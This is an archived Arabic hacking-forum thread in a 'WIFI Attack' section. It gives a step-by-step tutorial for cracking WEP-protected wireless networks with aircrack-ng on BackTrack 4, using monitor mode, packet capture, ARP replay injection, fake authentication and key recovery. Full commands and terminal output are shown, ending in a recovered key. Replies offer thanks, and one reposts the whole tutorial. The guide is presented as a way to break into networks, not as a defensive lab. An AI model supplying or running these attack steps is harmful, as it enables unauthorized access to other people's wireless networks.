:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   WIFI Attack (http://www.vbspiders.com/vb/f325.html)
-   -   شرح اختراق شبكات الوايرلس بالباك تراك (http://www.vbspiders.com/vb/t29133.html)

ZrIqE ViRuS 05-10-2010 04:02 AM

شرح اختراق شبكات الوايرلس بالباك تراك
 
السلام عليكم ورحمة الله وبركاته
[/COLOR][/SIZE]

اعتذر منكم احبتي على غيبتي ولكن الظروف اقوى من كل شي


اود ان أضع بين أيديكم شرح عن كيفية كسر حماية شبكة وايرلس نوع الحماية تبعها
web
وهذه الحماية سهلة جدا للكسر وليست صعبه كالـ wpa wpa/wpa2
لأنها تعتمد على تجميع باكيتس وكسرهم .. ومعرفه كلمة السر
طيب .. أولا يجب أن نفهم عدة أشياء
أن هذا التشفير فيه نوعين ..
اما 64 بت .. او 128 بت ..
بحيث ان ال128 بت يجب ان تكون كلمة السر مكونة من 23 حرف .. وما بعتقد أن يستخدمها أحد .. بل الأكثر يستخدم 64 بت .. اللتي تكون مكونة من 5 أو 10 أحرف
وهذا سهل للجميع حفظه فهم يستخدمونها ..

فإن كسر 128 نفس كسر ال 64
لكن يجب الحصول على باكيتس أكثر
طيب .. نبدأ بالشرح ...
الأدوات المستخدمة هي حزمة
aircrack
ويمكن تحميلها من موقعها الرسمي وتثبيتها
والمهم اننا نعمل على بيئة لينوكس توزيعه باك تراك4 لأن كل شي نحتاجه موجود فيها
طيب .. نبدأ
أولا نعرف اسم كرت الوايرلس اللي عندنا بالجهاز .. سواء لابتوب او جهاز ثابت
فنكتب بالشيل
iwconfig
فنجد مكتوب بجنبه
IEEE 802.11bg
انا عندي اسمه
wlan0
اوك .. الأن
نشغل المونيتور على اسم الكرت .. يعني المراقبة

كود:

airmon-ng start wlan0

root@bt:~# airmon-ng start wlan0


Interface      Chipset        Driver

wlan0          Atheros        ath5k - [phy0]
                                (monitor mode enabled on mon0)


اشتغل على الـ mon0
قد يسأل البعض ليش على mon0 مش على الأساسي wlan0
اقول حسب نوع الكرت .. وهل هو حجديث او لا .. لان بإمكانك ان تشغل مراقبة على أكثر من قناة .. وهو يعطيك اسم جديد


الأن نشغل الـ
airodump-ng
ونكتب بعدها اسم الكرت اللي تفعل عليه المراقبة وهو الأن mon0
لكي نرى الراوترات المحيطة بنا
فنكتب بالشيل

كود:

airodump-ng mon0
@ نــــــــــــــــــــلاحــــــــــظ @

كود:

CH 11 ][ Elapsed: 4 s ][ 2010-03-12 13:11

 BSSID              PWR  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

 00:1F:9F:D3:1F:EB  -54      16        0    0  7  54  WEP  WEP        mine

 BSSID              STATION            PWR  Rate    Lost  Packets  Probes

 00:1F:9F:D3:1F:EB  00:13:CE:4F:B5:51  -48    0 - 1    17        9


ما يهمنا .. هو
اسم الراوتر والقناة اللي تشتغل عليها والماك أدريس للراوتر .. والماك أدريس للمتصل بها

طيب الأن
اسم الراوتر هو
mine
القناة اللي تستخدمها هي
7
الماك أدريس للراوتر
00:1F:9F:D3:1F:EB
الماك أدريس للجهاز المتصل
00:13:CE:4F:B5:51

اوك .. الأن نوقف المراقبة عن الكرت mon0 and wlan0

airmon-ng stop mon0
airmon-ng stop wlan0

كود:

root@bt:~# airmon-ng stop mon0


Interface      Chipset        Driver

wlan0          Atheros        ath5k - [phy0]
mon0            Atheros        ath5k - [phy0] (removed)

root@bt:~# airmon-ng stop wlan0


Interface      Chipset        Driver

wlan0          Atheros        ath5k - [phy0]
                                (monitor mode disabled


وذلك لكي نعيد تشغيل المراقبة على نفس القناة .. (تنجح بدون ذلك .. لكن الأفضل عملها)

نشغل المراقبة على القناة 7 اللي عليها الراوتر

airmon-ng start wlan0 7


كود:

root@bt:~# airmon-ng start wlan0 7


Interface      Chipset        Driver

wlan0          Atheros        ath5k - [phy0]
                                (monitor mode enabled on mon0)

أخبرنا أنه تم تفعيل المراقبة على اسم
mon0
اوك .. الأن كل شي تمام
نبدأ بعمل airodump-ng
نكتب بالشيل

كود:

airodump-ng -c 7 --bssid 00:1F:9F:D3:1F:EB -w wwww mon0

@#@ النــــــتـــــيــــجــة @#@

كود:

CH  7 ][ Elapsed: 0 s ][ 2010-03-12 13:22

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

 00:1F:9F:D3:1F:EB  -46 100      32        7    2  7  54  WEP  WEP        mine

 BSSID              STATION            PWR  Rate    Lost  Packets  Probes

 00:1F:9F:D3:1F:EB  00:13:CE:4F:B5:51  -47    0 - 5    488      29

الأن نشغل الaireplay-ng
حتى نجمع الباكيتس

فنكتب

كود:

aireplay-ng -3 -b 00:1F:9F:D3:1F:EB -h 00:13:CE:4F:B5:51 mon0
-3 ... arprequest تجميع طلبات الباكيتس
-b بعدها الماك أدريس للراوتر
-h بعدها الماك أدريس للمتصل
mon0 اسم الكرت اللي نراقب عليه

يطلعلنا هكذا

كود:

root@bt:~# aireplay-ng -3 -b 00:1F:9F:D3:1F:EB -h 00:13:CE:4F:B5:51 mon0
The interface MAC (00:19:5B:D1:E4:36) doesn't match the specified MAC (-h).
        ifconfig mon0 hw ether 00:13:CE:4F:B5:51
13:26:55  Waiting for beacon frame (BSSID: 00:1F:9F:D3:1F:EB) on channel 7
Saving ARP requests in replay_arp-0312-132655.cap
You should also start airodump-ng to capture replies.
ad 325 packets (got 0 ARP requests and 93 ACKs), sent 0 packets...(0 pps)

الأن المهم هو الأر بي ARP وتجميعهم .. ولزيادة ذلك
نشغل ال aireplay-ng لإرسال باكتس زائفة للراوتر وتجميع packets and ARP
فنكتب بالشيل

كود:

aireplay-ng -1 7000 -e mine -a 00:1F:9F:D3:1F:EB -h 00:13:CE:4F:B5:51 mon0
-e اسم الراوتر
-a الماك أدريس للراوتر
-h الماك أدريس للجهاز المتصل

فيبدأ بإرسال باكيتس زائفة

ثم ننتقل للشاشة الموجود فيها تجميع الباكيتس
فنجد أنهم زادو

كود:

root@bt:~# aireplay-ng -3 -b 00:1F:9F:D3:1F:EB -h 00:13:CE:4F:B5:51 mon0
For information, no action required: Using gettimeofday() instead of /dev/rtc
The interface MAC (00:19:5B:D1:E4:36) doesn't match the specified MAC (-h).
        ifconfig mon0 hw ether 00:13:CE:4F:B5:51
13:31:20  Waiting for beacon frame (BSSID: 00:1F:9F:D3:1F:EB) on channel 7
Saving ARP requests in replay_arp-0312-133120.cap
You should also start airodump-ng to capture replies.
ad 537517 packets (got 19757 ARP requests and 211372 ACKs), sent 224454 packets...(499 pps)

ونلاحظ زيادة بالباكيتس إلى 537517 .. وزيادة بالـ ARP إلى 19757

والأن أصبح لدينا عدد جيد من الباكيتس والأر بي

فنشغل الـ
aircrack-ng
ونكتب بشاشة مستقلة


كود:

aircrack-ng -z -b 00:1F:9F:D3:1F:EB ww*.cap

-z أي أنها ويب
-b وبعدها الماك أدريس للراوتر
ww*.cap ملف الكاب

فيبدأ بالكسر


كود:

                                                    Aircrack-ng 1.0 r1668


                                    [00:00:53] Tested 17287 keys (got 16942 IVs)

  KB    depth  byte(vote)
    0    0/  3  12(27136) 6F(25088) A2(24064) 8D(23808) 46(23552) C1(23296) 0E(23040) 70(23040) 87(23040)
    1    4/  6  70(23296) 43(23040) 44(23040) 94(23040) C8(23040) 2B(22784) D1(22784) F5(22784) 34(22528)
    2    0/  9  23(25856) 65(25088) 93(25088) 9B(24576) A3(23808) 08(23552) 40(23552) 4F(23296) 64(23296)
    3    0/ 16  12(24832) AB(23040) 30(23040) 8B(22528) 81(22528) 35(22272) 75(22272) AA(22016) C7(22016)
    4    5/  8  31(24064) 87(23296) 1A(23296) B0(22784) A0(22528) D9(22528) 41(22272) F4(22272) 6C(21760)

                        KEY FOUND! [ 12:31:23:12:31 ]
        Decrypted correctly: 100%


نلاحظ أنه كسره وعرفنا كلمة السر
KEY FOUND! [ 12:31:23:12:31 ]
وهي بين الـ :
يعني هي
1231231231


مبرووووووووووووووك عليك الرقم السري حق الوايرلس

ملاحظة .. أنه قد تحتاج إلى عدد أكبر من الباكيتس .. وقد تنجح بأقل
وقد تواجه مشكلة انه تجد ان القناة للراوتر هي مثلا 144 او 158 .. ولا يمكن مراقبتها ..


الموضوع مُهدى الى الاخ العزيز الحضراني وبقية الاخوان الاعزاء ..... وصلى الله على سيدنا محمد ....


ادعوا لامواتنا يا شباب وادعوا لي بالتوفيق والتيسير



بالتوفيق




منقول عن Cyan

موفقين

ALG_vbspiders 05-10-2010 12:37 PM

والله شرح رائع بصح خوو يدوخ الراس

مافهمت والوا خوو

شكرا لك على كل حال خوو

A7MAD 05-12-2010 01:58 AM

[align=center]
جميل جدا ....

انا تبعت في الاول ... بعدين وقفت ..

الطريقة بس على الينوكس ....

افدني افادك الله
[/align]

habil 05-17-2010 02:20 PM

3ajani al mawdhou3

J0kEr HaCkEr 10-05-2010 02:34 AM

مشكور

hamo_smsm 12-11-2010 08:32 AM

موفقين جميعا

hamo_smsm 12-11-2010 08:35 AM

الف شكر

hamo_smsm 12-11-2010 08:58 AM

الف شكر

kamal199 12-12-2010 09:15 PM

الف شكر لك بارك الله فيك

ddcc 07-08-2011 10:24 AM

الف شكر مو بس ترا وزيادة ^_^

l-l 07-08-2011 10:36 AM

الف شكر

cisco_security 07-21-2011 03:48 PM

شرح روعه من عضو و لا اروع
بارك الله فيك يا غلا
الشرح مفهوم وواضح
ثانكس

musan 07-23-2011 08:55 AM

thx but there no way to try it on Windows Xp or Win7 ??

قروش 07-24-2011 12:58 AM

مبدع أخوي

تقديري

جبروت هكر 07-30-2013 02:38 AM

رد: شرح اختراق شبكات الوايرلس بالباك تراك
 
اقتباس:

المشاركة الأصلية كتبت بواسطة ZrIqE ViRuS (المشاركة 139053)
السلام عليكم ورحمة الله وبركاته
[/COLOR][/SIZE]

اعتذر منكم احبتي على غيبتي ولكن الظروف اقوى من كل شي


اود ان أضع بين أيديكم شرح عن كيفية كسر حماية شبكة وايرلس نوع الحماية تبعها
web
وهذه الحماية سهلة جدا للكسر وليست صعبه كالـ wpa wpa/wpa2
لأنها تعتمد على تجميع باكيتس وكسرهم .. ومعرفه كلمة السر
طيب .. أولا يجب أن نفهم عدة أشياء
أن هذا التشفير فيه نوعين ..
اما 64 بت .. او 128 بت ..
بحيث ان ال128 بت يجب ان تكون كلمة السر مكونة من 23 حرف .. وما بعتقد أن يستخدمها أحد .. بل الأكثر يستخدم 64 بت .. اللتي تكون مكونة من 5 أو 10 أحرف
وهذا سهل للجميع حفظه فهم يستخدمونها ..

فإن كسر 128 نفس كسر ال 64
لكن يجب الحصول على باكيتس أكثر
طيب .. نبدأ بالشرح ...
الأدوات المستخدمة هي حزمة
aircrack
ويمكن تحميلها من موقعها الرسمي وتثبيتها
والمهم اننا نعمل على بيئة لينوكس توزيعه باك تراك4 لأن كل شي نحتاجه موجود فيها
طيب .. نبدأ
أولا نعرف اسم كرت الوايرلس اللي عندنا بالجهاز .. سواء لابتوب او جهاز ثابت
فنكتب بالشيل
iwconfig
فنجد مكتوب بجنبه
IEEE 802.11bg
انا عندي اسمه
wlan0
اوك .. الأن
نشغل المونيتور على اسم الكرت .. يعني المراقبة

كود:

airmon-ng start wlan0
 
root@bt:~# airmon-ng start wlan0
 
 
Interface      Chipset        Driver
 
wlan0          Atheros        ath5k - [phy0]
                                (monitor mode enabled on mon0)


اشتغل على الـ mon0
قد يسأل البعض ليش على mon0 مش على الأساسي wlan0
اقول حسب نوع الكرت .. وهل هو حجديث او لا .. لان بإمكانك ان تشغل مراقبة على أكثر من قناة .. وهو يعطيك اسم جديد


الأن نشغل الـ
airodump-ng
ونكتب بعدها اسم الكرت اللي تفعل عليه المراقبة وهو الأن mon0
لكي نرى الراوترات المحيطة بنا
فنكتب بالشيل

كود:

airodump-ng mon0
@ نــــــــــــــــــــلاحــــــــــظ @

كود:

CH 11 ][ Elapsed: 4 s ][ 2010-03-12 13:11
 
 BSSID              PWR  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
 
 00:1F:9F:D3:1F:EB  -54      16        0    0  7  54  WEP  WEP        mine
 
 BSSID              STATION            PWR  Rate    Lost  Packets  Probes
 
 00:1F:9F:D3:1F:EB  00:13:CE:4F:B5:51  -48    0 - 1    17        9


ما يهمنا .. هو
اسم الراوتر والقناة اللي تشتغل عليها والماك أدريس للراوتر .. والماك أدريس للمتصل بها

طيب الأن
اسم الراوتر هو
mine
القناة اللي تستخدمها هي
7
الماك أدريس للراوتر
00:1F:9F:D3:1F:EB
الماك أدريس للجهاز المتصل
00:13:CE:4F:B5:51

اوك .. الأن نوقف المراقبة عن الكرت mon0 and wlan0

airmon-ng stop mon0
airmon-ng stop wlan0

كود:

root@bt:~# airmon-ng stop mon0
 
 
Interface      Chipset        Driver
 
wlan0          Atheros        ath5k - [phy0]
mon0            Atheros        ath5k - [phy0] (removed)
 
root@bt:~# airmon-ng stop wlan0
 
 
Interface      Chipset        Driver
 
wlan0          Atheros        ath5k - [phy0]
                                (monitor mode disabled


وذلك لكي نعيد تشغيل المراقبة على نفس القناة .. (تنجح بدون ذلك .. لكن الأفضل عملها)

نشغل المراقبة على القناة 7 اللي عليها الراوتر

airmon-ng start wlan0 7


كود:

root@bt:~# airmon-ng start wlan0 7
 
 
Interface      Chipset        Driver
 
wlan0          Atheros        ath5k - [phy0]
                                (monitor mode enabled on mon0)

أخبرنا أنه تم تفعيل المراقبة على اسم
mon0
اوك .. الأن كل شي تمام
نبدأ بعمل airodump-ng
نكتب بالشيل

كود:

airodump-ng -c 7 --bssid 00:1F:9F:D3:1F:EB -w wwww mon0

@#@ النــــــتـــــيــــجــة @#@

كود:

CH  7 ][ Elapsed: 0 s ][ 2010-03-12 13:22
 
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
 
 00:1F:9F:D3:1F:EB  -46 100      32        7    2  7  54  WEP  WEP        mine
 
 BSSID              STATION            PWR  Rate    Lost  Packets  Probes
 
 00:1F:9F:D3:1F:EB  00:13:CE:4F:B5:51  -47    0 - 5    488      29

الأن نشغل الaireplay-ng
حتى نجمع الباكيتس

فنكتب

كود:

aireplay-ng -3 -b 00:1F:9F:D3:1F:EB -h 00:13:CE:4F:B5:51 mon0
-3 ... arprequest تجميع طلبات الباكيتس
-b بعدها الماك أدريس للراوتر
-h بعدها الماك أدريس للمتصل
mon0 اسم الكرت اللي نراقب عليه

يطلعلنا هكذا

كود:

root@bt:~# aireplay-ng -3 -b 00:1F:9F:D3:1F:EB -h 00:13:CE:4F:B5:51 mon0
The interface MAC (00:19:5B:D1:E4:36) doesn't match the specified MAC (-h).
        ifconfig mon0 hw ether 00:13:CE:4F:B5:51
13:26:55  Waiting for beacon frame (BSSID: 00:1F:9F:D3:1F:EB) on channel 7
Saving ARP requests in replay_arp-0312-132655.cap
You should also start airodump-ng to capture replies.
ad 325 packets (got 0 ARP requests and 93 ACKs), sent 0 packets...(0 pps)

الأن المهم هو الأر بي ARP وتجميعهم .. ولزيادة ذلك
نشغل ال aireplay-ng لإرسال باكتس زائفة للراوتر وتجميع packets and ARP
فنكتب بالشيل

كود:

aireplay-ng -1 7000 -e mine -a 00:1F:9F:D3:1F:EB -h 00:13:CE:4F:B5:51 mon0
-e اسم الراوتر
-a الماك أدريس للراوتر
-h الماك أدريس للجهاز المتصل

فيبدأ بإرسال باكيتس زائفة

ثم ننتقل للشاشة الموجود فيها تجميع الباكيتس
فنجد أنهم زادو

كود:

root@bt:~# aireplay-ng -3 -b 00:1F:9F:D3:1F:EB -h 00:13:CE:4F:B5:51 mon0
For information, no action required: Using gettimeofday() instead of /dev/rtc
The interface MAC (00:19:5B:D1:E4:36) doesn't match the specified MAC (-h).
        ifconfig mon0 hw ether 00:13:CE:4F:B5:51
13:31:20  Waiting for beacon frame (BSSID: 00:1F:9F:D3:1F:EB) on channel 7
Saving ARP requests in replay_arp-0312-133120.cap
You should also start airodump-ng to capture replies.
ad 537517 packets (got 19757 ARP requests and 211372 ACKs), sent 224454 packets...(499 pps)

ونلاحظ زيادة بالباكيتس إلى 537517 .. وزيادة بالـ ARP إلى 19757

والأن أصبح لدينا عدد جيد من الباكيتس والأر بي

فنشغل الـ
aircrack-ng
ونكتب بشاشة مستقلة


كود:

aircrack-ng -z -b 00:1F:9F:D3:1F:EB ww*.cap

-z أي أنها ويب
-b وبعدها الماك أدريس للراوتر
ww*.cap ملف الكاب

فيبدأ بالكسر


كود:

                                                    Aircrack-ng 1.0 r1668
 
 
                                    [00:00:53] Tested 17287 keys (got 16942 IVs)
 
  KB    depth  byte(vote)
    0    0/  3  12(27136) 6F(25088) A2(24064) 8D(23808) 46(23552) C1(23296) 0E(23040) 70(23040) 87(23040)
    1    4/  6  70(23296) 43(23040) 44(23040) 94(23040) C8(23040) 2B(22784) D1(22784) F5(22784) 34(22528)
    2    0/  9  23(25856) 65(25088) 93(25088) 9B(24576) A3(23808) 08(23552) 40(23552) 4F(23296) 64(23296)
    3    0/ 16  12(24832) AB(23040) 30(23040) 8B(22528) 81(22528) 35(22272) 75(22272) AA(22016) C7(22016)
    4    5/  8  31(24064) 87(23296) 1A(23296) B0(22784) A0(22528) D9(22528) 41(22272) F4(22272) 6C(21760)
 
                        KEY FOUND! [ 12:31:23:12:31 ]
        Decrypted correctly: 100%


نلاحظ أنه كسره وعرفنا كلمة السر
KEY FOUND! [ 12:31:23:12:31 ]
وهي بين الـ :
يعني هي
1231231231


مبرووووووووووووووك عليك الرقم السري حق الوايرلس

ملاحظة .. أنه قد تحتاج إلى عدد أكبر من الباكيتس .. وقد تنجح بأقل
وقد تواجه مشكلة انه تجد ان القناة للراوتر هي مثلا 144 او 158 .. ولا يمكن مراقبتها ..


الموضوع مُهدى الى الاخ العزيز الحضراني وبقية الاخوان الاعزاء ..... وصلى الله على سيدنا محمد ....


ادعوا لامواتنا يا شباب وادعوا لي بالتوفيق والتيسير



بالتوفيق




منقول عن Cyan

موفقين


///

:122: طيب وندز ينفع معها...


الساعة الآن 09:15 AM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0